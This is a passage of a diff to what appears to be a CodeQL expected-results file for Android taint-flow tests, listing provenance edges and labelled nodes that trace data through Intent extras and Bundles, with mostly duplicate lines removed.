| provenance | MaD:43 | | TestStartServiceToIntent.java:67:35:67:47 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:67:35:67:47 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:67:35:67:47 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:68:18:68:46 | getStringExtra(...) | provenance | MaD:43 | -| TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:68:18:68:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:68:18:68:46 | getStringExtra(...) 
| provenance | MaD:43 | | TestStartServiceToIntent.java:73:31:73:43 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:73:31:73:43 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:73:31:73:43 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:74:18:74:46 | getStringExtra(...) | provenance | MaD:43 | -| TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:74:18:74:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:74:18:74:46 | getStringExtra(...) 
| provenance | MaD:43 | | TestStartServiceToIntent.java:79:33:79:45 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:79:33:79:45 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:79:33:79:45 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:80:18:80:46 | getStringExtra(...) | provenance | MaD:43 | -| TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:80:18:80:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:80:18:80:46 | getStringExtra(...) 
| provenance | MaD:43 | | TestStartServiceToIntent.java:85:30:85:42 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:85:30:85:42 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:85:30:85:42 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:86:18:86:46 | getStringExtra(...) | provenance | MaD:43 | -| TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:86:18:86:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:86:18:86:46 | getStringExtra(...) 
| provenance | MaD:43 | | TestStartServiceToIntent.java:90:35:90:47 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:90:35:90:47 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:90:35:90:47 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:91:18:91:46 | getStringExtra(...) | provenance | MaD:43 | -| TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:91:18:91:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:91:18:91:46 | getStringExtra(...) | provenance | MaD:43 | nodes | Test.java:22:19:22:32 | it : Set [] : String | semmle.label | it : Set [] : String | 
@@ -2432,142 +1848,73 @@ nodes | Test.java:22:44:22:56 | iterator(...) : Iterator [] : String | semmle.label | iterator(...) : Iterator [] : String | | Test.java:22:44:22:63 | next(...) : String | semmle.label | next(...) : String | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | i : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | i : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | i : Intent [android.content.Intent.extras, ] : Boolean | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | i : Intent [android.content.Intent.extras, ] : Boolean | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | i : Intent [android.content.Intent.extras, ] : Bundle | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | i : Intent [android.content.Intent.extras, ] : Bundle | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence[] | | 
Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Intent | semmle.label | i : Intent [android.content.Intent.extras, ] : Intent | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Intent | semmle.label | i : Intent [android.content.Intent.extras, ] : Intent | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | i : Intent [android.content.Intent.extras, ] : IntentSender | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | i : Intent [android.content.Intent.extras, ] : IntentSender | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | semmle.label | i : Intent [android.content.Intent.extras, ] : Number | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | semmle.label | i : Intent [android.content.Intent.extras, ] : Number | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | semmle.label | i : Intent [android.content.Intent.extras, ] : Object | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | semmle.label | i : Intent [android.content.Intent.extras, ] : Object | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | 
semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | i : Intent [android.content.Intent.extras, ] : Serializable | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | i : Intent [android.content.Intent.extras, ] : Serializable | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String[] | semmle.label | i : Intent [android.content.Intent.extras, ] : String[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String[] | semmle.label | i : Intent [android.content.Intent.extras, ] : String[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | i : Intent [android.content.Intent.extras, ] : boolean[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | i : Intent [android.content.Intent.extras, ] : boolean[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | i : Intent [android.content.Intent.extras, ] : byte[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | i : Intent [android.content.Intent.extras, ] : byte[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : char[] | semmle.label | i : Intent [android.content.Intent.extras, ] : char[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : char[] | semmle.label | i : Intent [android.content.Intent.extras, ] : char[] | | Test.java:23:26:23:33 | i : Intent 
[android.content.Intent.extras, ] : double[] | semmle.label | i : Intent [android.content.Intent.extras, ] : double[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : double[] | semmle.label | i : Intent [android.content.Intent.extras, ] : double[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : float[] | semmle.label | i : Intent [android.content.Intent.extras, ] : float[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : float[] | semmle.label | i : Intent [android.content.Intent.extras, ] : float[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : int[] | semmle.label | i : Intent [android.content.Intent.extras, ] : int[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : int[] | semmle.label | i : Intent [android.content.Intent.extras, ] : int[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : long[] | semmle.label | i : Intent [android.content.Intent.extras, ] : long[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : long[] | semmle.label | i : Intent [android.content.Intent.extras, ] : long[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : short[] | semmle.label | i : Intent [android.content.Intent.extras, ] : short[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : short[] | semmle.label | i : Intent [android.content.Intent.extras, ] : short[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | i : Intent [android.content.Intent.extras, ] : ArrayList | -| 
Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | i : Intent [android.content.Intent.extras, ] : ArrayList | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | i : Intent [android.content.Intent.extras, ] : Boolean | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | i : Intent [android.content.Intent.extras, ] : Boolean | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | i : Intent [android.content.Intent.extras, ] : Bundle | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | i : Intent [android.content.Intent.extras, ] : Bundle | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Intent | semmle.label | i : Intent [android.content.Intent.extras, ] : Intent | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Intent | semmle.label | i : Intent [android.content.Intent.extras, ] : Intent | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | i : Intent [android.content.Intent.extras, ] : IntentSender | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : 
IntentSender | semmle.label | i : Intent [android.content.Intent.extras, ] : IntentSender | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Number | semmle.label | i : Intent [android.content.Intent.extras, ] : Number | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Number | semmle.label | i : Intent [android.content.Intent.extras, ] : Number | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Object | semmle.label | i : Intent [android.content.Intent.extras, ] : Object | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Object | semmle.label | i : Intent [android.content.Intent.extras, ] : Object | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | i : Intent [android.content.Intent.extras, ] : Serializable | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | i : Intent [android.content.Intent.extras, ] : Serializable | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | 
-| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String[] | semmle.label | i : Intent [android.content.Intent.extras, ] : String[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String[] | semmle.label | i : Intent [android.content.Intent.extras, ] : String[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | i : Intent [android.content.Intent.extras, ] : boolean[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | i : Intent [android.content.Intent.extras, ] : boolean[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | i : Intent [android.content.Intent.extras, ] : byte[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | i : Intent [android.content.Intent.extras, ] : byte[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : char[] | semmle.label | i : Intent [android.content.Intent.extras, ] : char[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : char[] | semmle.label | i : Intent [android.content.Intent.extras, ] : char[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : double[] | semmle.label | i : Intent [android.content.Intent.extras, ] : double[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : double[] | semmle.label | i : Intent [android.content.Intent.extras, ] : double[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : float[] | semmle.label | i : Intent [android.content.Intent.extras, ] : float[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : float[] | semmle.label | i : Intent [android.content.Intent.extras, ] : float[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : int[] | semmle.label | i : Intent 
[android.content.Intent.extras, ] : int[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : int[] | semmle.label | i : Intent [android.content.Intent.extras, ] : int[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : long[] | semmle.label | i : Intent [android.content.Intent.extras, ] : long[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : long[] | semmle.label | i : Intent [android.content.Intent.extras, ] : long[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : short[] | semmle.label | i : Intent [android.content.Intent.extras, ] : short[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : short[] | semmle.label | i : Intent [android.content.Intent.extras, ] : short[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | semmle.label | getExtras(...) : Bundle [] : ArrayList | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | semmle.label | getExtras(...) : Bundle [] : ArrayList | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Boolean | semmle.label | getExtras(...) : Bundle [] : Boolean | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Boolean | semmle.label | getExtras(...) : Bundle [] : Boolean | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Bundle | semmle.label | getExtras(...) : Bundle [] : Bundle | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Bundle | semmle.label | getExtras(...) : Bundle [] : Bundle | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence | semmle.label | getExtras(...) : Bundle [] : CharSequence | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence | semmle.label | getExtras(...) 
: Bundle [] : CharSequence | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence[] | semmle.label | getExtras(...) : Bundle [] : CharSequence[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence[] | semmle.label | getExtras(...) : Bundle [] : CharSequence[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Intent | semmle.label | getExtras(...) : Bundle [] : Intent | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Intent | semmle.label | getExtras(...) : Bundle [] : Intent | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : IntentSender | semmle.label | getExtras(...) : Bundle [] : IntentSender | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : IntentSender | semmle.label | getExtras(...) : Bundle [] : IntentSender | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | semmle.label | getExtras(...) : Bundle [] : Number | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | semmle.label | getExtras(...) : Bundle [] : Number | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | semmle.label | getExtras(...) : Bundle [] : Object | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | semmle.label | getExtras(...) : Bundle [] : Object | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Parcelable | semmle.label | getExtras(...) : Bundle [] : Parcelable | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Parcelable | semmle.label | getExtras(...) : Bundle [] : Parcelable | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Parcelable[] | semmle.label | getExtras(...) : Bundle [] : Parcelable[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Parcelable[] | semmle.label | getExtras(...) : Bundle [] : Parcelable[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Serializable | semmle.label | getExtras(...) : Bundle [] : Serializable | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Serializable | semmle.label | getExtras(...) 
: Bundle [] : Serializable | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String[] | semmle.label | getExtras(...) : Bundle [] : String[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String[] | semmle.label | getExtras(...) : Bundle [] : String[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : boolean[] | semmle.label | getExtras(...) : Bundle [] : boolean[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : boolean[] | semmle.label | getExtras(...) : Bundle [] : boolean[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : byte[] | semmle.label | getExtras(...) : Bundle [] : byte[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : byte[] | semmle.label | getExtras(...) : Bundle [] : byte[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : char[] | semmle.label | getExtras(...) : Bundle [] : char[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : char[] | semmle.label | getExtras(...) : Bundle [] : char[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : double[] | semmle.label | getExtras(...) : Bundle [] : double[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : double[] | semmle.label | getExtras(...) : Bundle [] : double[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : float[] | semmle.label | getExtras(...) : Bundle [] : float[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : float[] | semmle.label | getExtras(...) : Bundle [] : float[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : int[] | semmle.label | getExtras(...) : Bundle [] : int[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : int[] | semmle.label | getExtras(...) : Bundle [] : int[] | | Test.java:23:45:23:57 | getExtras(...) 
: Bundle [] : long[] | semmle.label | getExtras(...) : Bundle [] : long[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : long[] | semmle.label | getExtras(...) : Bundle [] : long[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : short[] | semmle.label | getExtras(...) : Bundle [] : short[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : short[] | semmle.label | getExtras(...) : Bundle [] : short[] | | Test.java:24:19:24:30 | b : BaseBundle [] : String | semmle.label | b : BaseBundle [] : String | | Test.java:24:19:24:30 | b : Bundle [] : Object | semmle.label | b : Bundle [] : Object | 
@@ -2603,23 +1950,19 @@ nodes | Test.java:41:45:41:73 | newBundleWithMapKey(...) : Bundle [] : String | semmle.label | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:41:65:41:72 | source(...) : String | semmle.label | source(...) : String | | Test.java:42:10:42:23 | new Intent(...) : Intent [android.content.Intent.extras, ] : String | semmle.label | new Intent(...) : Intent [android.content.Intent.extras, ] : String | -| Test.java:42:10:42:23 | new Intent(...) : Intent [android.content.Intent.extras, ] : String | semmle.label | new Intent(...) : Intent [android.content.Intent.extras, ] : String | | Test.java:42:21:42:22 | in : Intent [android.content.Intent.extras, ] : String | semmle.label | in : Intent [android.content.Intent.extras, ] : String | | Test.java:43:9:43:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:43:19:43:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:43:36:43:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:43:36:43:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:48:16:48:76 | (...)... : Intent [android.content.Intent.extras, ] : Object | semmle.label | (...)... : Intent [android.content.Intent.extras, ] : Object | | Test.java:48:24:48:76 | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | semmle.label | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | | Test.java:48:45:48:75 | newBundleWithMapValue(...) : Bundle [] : Object | semmle.label | newBundleWithMapValue(...) : Bundle [] : Object | | Test.java:48:67:48:74 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:49:10:49:23 | new Intent(...) 
: Intent [android.content.Intent.extras, ] : Object | semmle.label | new Intent(...) : Intent [android.content.Intent.extras, ] : Object | -| Test.java:49:10:49:23 | new Intent(...) : Intent [android.content.Intent.extras, ] : Object | semmle.label | new Intent(...) : Intent [android.content.Intent.extras, ] : Object | | Test.java:49:21:49:22 | in : Intent [android.content.Intent.extras, ] : Object | semmle.label | in : Intent [android.content.Intent.extras, ] : Object | | Test.java:50:9:50:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:50:21:50:41 | getIntent_extras(...) : Bundle [] : Object | semmle.label | getIntent_extras(...) : Bundle [] : Object | | Test.java:50:38:50:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | -| Test.java:50:38:50:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | | Test.java:55:13:55:25 | (...)... : Uri | semmle.label | (...)... : Uri | | Test.java:55:18:55:25 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:56:10:56:29 | new Intent(...) : Intent [android.content.Intent.data] : Uri | semmle.label | new Intent(...) : Intent [android.content.Intent.data] : Uri | 
@@ -2645,30 +1988,24 @@ nodes | Test.java:83:22:83:43 | (...)... : CharSequence | semmle.label | (...)... : CharSequence | | Test.java:83:36:83:43 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:84:10:84:45 | createChooser(...) : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | createChooser(...) : Intent [android.content.Intent.extras, ] : CharSequence | -| Test.java:84:10:84:45 | createChooser(...) : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | createChooser(...) : Intent [android.content.Intent.extras, ] : CharSequence | | Test.java:84:37:84:38 | in : CharSequence | semmle.label | in : CharSequence | | Test.java:85:9:85:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:85:21:85:41 | getIntent_extras(...) : Bundle [] : CharSequence | semmle.label | getIntent_extras(...) : Bundle [] : CharSequence | | Test.java:85:38:85:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | out : Intent [android.content.Intent.extras, ] : CharSequence | -| Test.java:85:38:85:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | out : Intent [android.content.Intent.extras, ] : CharSequence | | Test.java:90:22:90:43 | (...)... : IntentSender | semmle.label | (...)... : IntentSender | | Test.java:90:36:90:43 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:91:10:91:45 | createChooser(...) : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | createChooser(...) : Intent [android.content.Intent.extras, ] : IntentSender | -| Test.java:91:10:91:45 | createChooser(...) : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | createChooser(...) : Intent [android.content.Intent.extras, ] : IntentSender | | Test.java:91:43:91:44 | in : IntentSender | semmle.label | in : IntentSender | | Test.java:92:9:92:42 | getMapValue(...) | semmle.label | getMapValue(...) 
